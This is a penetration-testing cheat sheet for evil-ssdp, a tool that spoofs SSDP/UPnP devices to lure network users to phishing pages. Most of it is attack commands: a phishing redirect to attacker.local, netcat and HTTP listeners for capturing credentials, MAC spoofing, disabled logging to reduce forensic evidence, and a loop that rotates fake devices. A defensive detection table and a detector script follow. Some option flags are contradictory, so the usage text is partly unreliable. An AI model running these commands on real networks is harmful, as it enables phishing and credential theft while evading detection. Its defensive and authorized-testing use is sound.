
evil-ssdp

evil-ssdp is a Kali Linux penetration testing tool that spoofs SSDP (Simple Service Discovery Protocol) and UPnP (Universal Plug and Play) responses. It creates fake network devices to redirect users to phishing pages during authorized internal network assessments. This tool tests network security awareness and device enumeration vulnerabilities.

# Update package managers
sudo apt update
sudo apt upgrade

# Install from Kali repositories
sudo apt install evil-ssdp

# Or install from source
git clone https://github.com/initstring/evil-ssdp.git
cd evil-ssdp
chmod +x evil-ssdp.py
sudo python3 evil-ssdp.py --help

SSDP is the discovery protocol used by UPnP devices on local networks. When a device joins the network, it sends SSDP messages to the multicast group (UDP port 1900) advertising its services. Clients search for and discover devices through these multicast packets, which carry no authentication, so any host on the segment can answer them.

Component | Purpose
SSDP multicast address | 239.255.255.250:1900 (standard UDP)
Device type | Identifies the device (printer, router, media player)
HTTP LOCATION | URL pointing to the device's XML descriptor
User-Agent | Device description sent in responses
Service description | XML file detailing device capabilities

# Display help and options
evil-ssdp.py --help

# List available templates
evil-ssdp.py --list

# Run with default template (Windows printer)
sudo python3 evil-ssdp.py

# Run with specific interface
sudo python3 evil-ssdp.py -i eth0

# Target specific network range
sudo python3 evil-ssdp.py -i eth0 -t 192.168.1.0/24

Templates define the fake device properties. Create a new template file in YAML format:

# custom_device.yaml
---
name: "Fake Printer"
description: "HP LaserJet Pro M479"
device_type: "urn:schemas-upnp-org:device:Printer:1"
manufacturer: "HP Inc."
model_name: "LaserJet Pro M479"
model_number: "M479fdw"
serial_number: "SN12345678"
http_port: 8080
http_server: "192.168.1.100"
services:
  - name: "PrinterService"
    type: "urn:schemas-upnp-org:service:Printer:1"

Load custom template:

sudo python3 evil-ssdp.py -f custom_device.yaml

# Windows Printer (default)
sudo python3 evil-ssdp.py -t windows-printer

# Philips Hue Bridge
sudo python3 evil-ssdp.py -t philips-hue

# NETGEAR Router
sudo python3 evil-ssdp.py -t netgear-router

# Apple AirPlay Device
sudo python3 evil-ssdp.py -t airplay

# Canon Scanner
sudo python3 evil-ssdp.py -t canon-scanner

# Sony TV
sudo python3 evil-ssdp.py -t sony-tv

# Start SSDP spoofing on default interface
sudo python3 evil-ssdp.py -i eth0

# Run with custom HTTP redirect (phishing page)
sudo python3 evil-ssdp.py -i eth0 -l http://attacker.local:8080/phish

# Enable verbose logging
sudo python3 evil-ssdp.py -i eth0 -v

# Run in background
sudo python3 evil-ssdp.py -i eth0 &

# Send continuous SSDP advertisements (every 30 seconds)
sudo python3 evil-ssdp.py -i eth0 --announce 30

Set up HTTP server to capture submitted credentials:

# Simple Python HTTP server with logging
python3 -m http.server 8080 > access.log 2>&1

# Using netcat to listen for raw requests
nc -l -p 8080

# Using tcpdump to capture traffic
sudo tcpdump -i eth0 -w ssdp_capture.pcap host 192.168.1.100

Monitor web server logs for authentication attempts:

tail -f access.log | grep "POST\|GET"

Limit attacks to specific network segments:

Option | Purpose
-i eth0 | Bind to a specific interface
-t 192.168.1.0/24 | Target CIDR range
--mac 00:11:22:33:44:55 | Spoof MAC address
--ttl 4 | Limit multicast TTL (hops)
--port 1900 | Alternative UDP port
--http-port 8080 | Custom HTTP service port

# Spoof MAC address to avoid detection
sudo python3 evil-ssdp.py -i eth0 --mac AA:BB:CC:DD:EE:FF

# Use VPN/proxy to isolate traffic
sudo openvpn --config /path/to/config.ovpn

# Monitor for detection
sudo tcpdump -i eth0 -n "icmp or dns"

# Disable logging to minimize forensic evidence
sudo python3 evil-ssdp.py -i eth0 > /dev/null 2>&1

# Use temporary IP address
sudo ifconfig eth0 192.168.1.200 netmask 255.255.255.0
Detection method | Purpose
SSDP traffic monitoring | Watch for multiple SSDP announcements from the same MAC
UPnP device inventory | Regular scans compared against known devices
Network segmentation | Isolate user networks from IoT devices
Port 1900 filtering | Block SSDP multicast at the network edge
Host-based detection | Monitor UPnP service discovery logs
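The following Python script is an added example, not code from evil-ssdp or from this page. It ties the SSDP message fields from the component table (NT, USN, LOCATION, SERVER) to the first two rows of the detection table: it parses SSDP NOTIFY messages as a capture tool would hand them over, compares each USN against a known-device inventory, and flags a single MAC that advertises several unrelated device types. The capture, MAC addresses, UUIDs and inventory are constructed; the check that LOCATION should point back at the sending IP is an added heuristic the page does not state.

```python
"""Parse SSDP announcements and flag the spoofing indicators listed in the
detection table. Added example for illustration; not code from evil-ssdp."""
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class SsdpAnnouncement:
    src_mac: str   # link-layer source, as a capture tool would record it
    src_ip: str    # IP source of the UDP datagram
    nt: str        # NT (NOTIFY) or ST (search response): the advertised type
    usn: str       # unique service name, normally "uuid:...::<type>"
    location: str  # URL of the device's XML descriptor
    server: str    # SERVER header, free-form device description


def parse_ssdp(src_mac: str, src_ip: str, raw: str) -> SsdpAnnouncement:
    """Parse one HTTPU-style SSDP message. Header names are case-insensitive,
    so they are upper-cased; the request/status line is skipped."""
    lines = raw.replace("\r\n", "\n").strip().split("\n")
    headers = {}
    for line in lines[1:]:
        key, sep, value = line.partition(":")
        if sep:
            headers[key.strip().upper()] = value.strip()
    return SsdpAnnouncement(
        src_mac=src_mac.lower(),
        src_ip=src_ip,
        nt=headers.get("NT") or headers.get("ST", ""),
        usn=headers.get("USN", ""),
        location=headers.get("LOCATION", ""),
        server=headers.get("SERVER", ""),
    )


def device_uuid(usn: str) -> str:
    """The 'uuid:...' prefix of a USN, which identifies the device in inventory."""
    return usn.split("::", 1)[0]


def find_indicators(announcements, known_uuids, max_types_per_mac=2):
    """Return (indicator, source_mac, detail) tuples. unknown-device: USN not
    in inventory; location-mismatch: LOCATION host differs from the sender
    (assumed heuristic); multi-device-mac: one MAC advertising more device
    types than a single real device plausibly would."""
    findings = []
    types_by_mac = defaultdict(set)
    for a in announcements:
        if a.nt.startswith("urn:") and ":device:" in a.nt:
            types_by_mac[a.src_mac].add(a.nt)
        if a.usn and device_uuid(a.usn) not in known_uuids:
            findings.append(("unknown-device", a.src_mac, a.usn))
        host = urlsplit(a.location).hostname
        if host and host != a.src_ip:
            findings.append(("location-mismatch", a.src_mac, a.location))
    for mac, types in types_by_mac.items():
        if len(types) > max_types_per_mac:
            findings.append(("multi-device-mac", mac, ";".join(sorted(types))))
    return findings


def _notify(nt, uuid, location):
    # Build a minimal ssdp:alive NOTIFY for the constructed sample below.
    return (
        "NOTIFY * HTTP/1.1\r\n"
        "HOST: 239.255.255.250:1900\r\n"
        f"NT: {nt}\r\n"
        "NTS: ssdp:alive\r\n"
        f"USN: {uuid}::{nt}\r\n"
        f"LOCATION: {location}\r\n"
        "SERVER: Linux/5.10 UPnP/1.0 Example/1.0\r\n\r\n"
    )


# Constructed sample capture: one legitimate printer, and one host that
# advertises three unrelated device types with descriptors on another host.
SAMPLE_CAPTURE = [
    ("00:1e:0b:aa:bb:cc", "192.168.1.50",
     _notify("urn:schemas-upnp-org:device:Printer:1", "uuid:printer-0001",
             "http://192.168.1.50:80/device.xml")),
    ("de:ad:be:ef:00:01", "192.168.1.200",
     _notify("urn:schemas-upnp-org:device:Printer:1", "uuid:rogue-0001",
             "http://192.168.1.100:8080/printer.xml")),
    ("de:ad:be:ef:00:01", "192.168.1.200",
     _notify("urn:schemas-upnp-org:device:InternetGatewayDevice:1",
             "uuid:rogue-0002", "http://192.168.1.100:8080/router.xml")),
    ("de:ad:be:ef:00:01", "192.168.1.200",
     _notify("urn:schemas-upnp-org:device:MediaRenderer:1", "uuid:rogue-0003",
             "http://192.168.1.100:8080/tv.xml")),
]
KNOWN_UUIDS = {"uuid:printer-0001"}  # constructed inventory of approved devices


def analyze_sample():
    announcements = [parse_ssdp(mac, ip, raw) for mac, ip, raw in SAMPLE_CAPTURE]
    return find_indicators(announcements, KNOWN_UUIDS)


if __name__ == "__main__":
    for kind, mac, detail in analyze_sample():
        print(f"{kind:<18} {mac}  {detail}")
```

On the constructed capture the legitimate printer produces no findings, while the second MAC is reported seven times: three unknown USNs, three LOCATION URLs that point at a different host than the sender, and one multi-device-mac entry. In practice the inventory would come from the regular UPnP scans the table recommends, and the announcements from a pcap or a host-based UPnP log rather than from inline strings.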

# Combine with other tools for full assessment
sudo evil-ssdp.py -i eth0 &
sudo responder -I eth0 -v

# Create proxy between victim and fake device
sudo python3 evil-ssdp.py -i eth0 --proxy http://internal-phish:8080

# Monitor who connects
sudo evil-ssdp.py -i eth0 --log connections.txt

# Rotate device types to increase interaction
for device in printer router scanner tv; do
  sudo python3 evil-ssdp.py -i eth0 -t $device &
done

Issue | Solution
"Permission denied" | Use sudo for raw network operations
No SSDP advertisements | Check the interface with ip link show
Firewall blocking | Verify UDP 1900 is allowed
Template not found | Ensure the YAML syntax is valid
HTTP server unreachable | Check routing and firewall rules

  • Only use on networks where you have explicit written authorization
  • Document all authorized testing in rules of engagement
  • Notify network owners of findings immediately after testing
  • Do not redirect users to malicious content outside scope
  • Ensure proper incident response coordination with defenders
  • Maintain detailed logs of all testing activities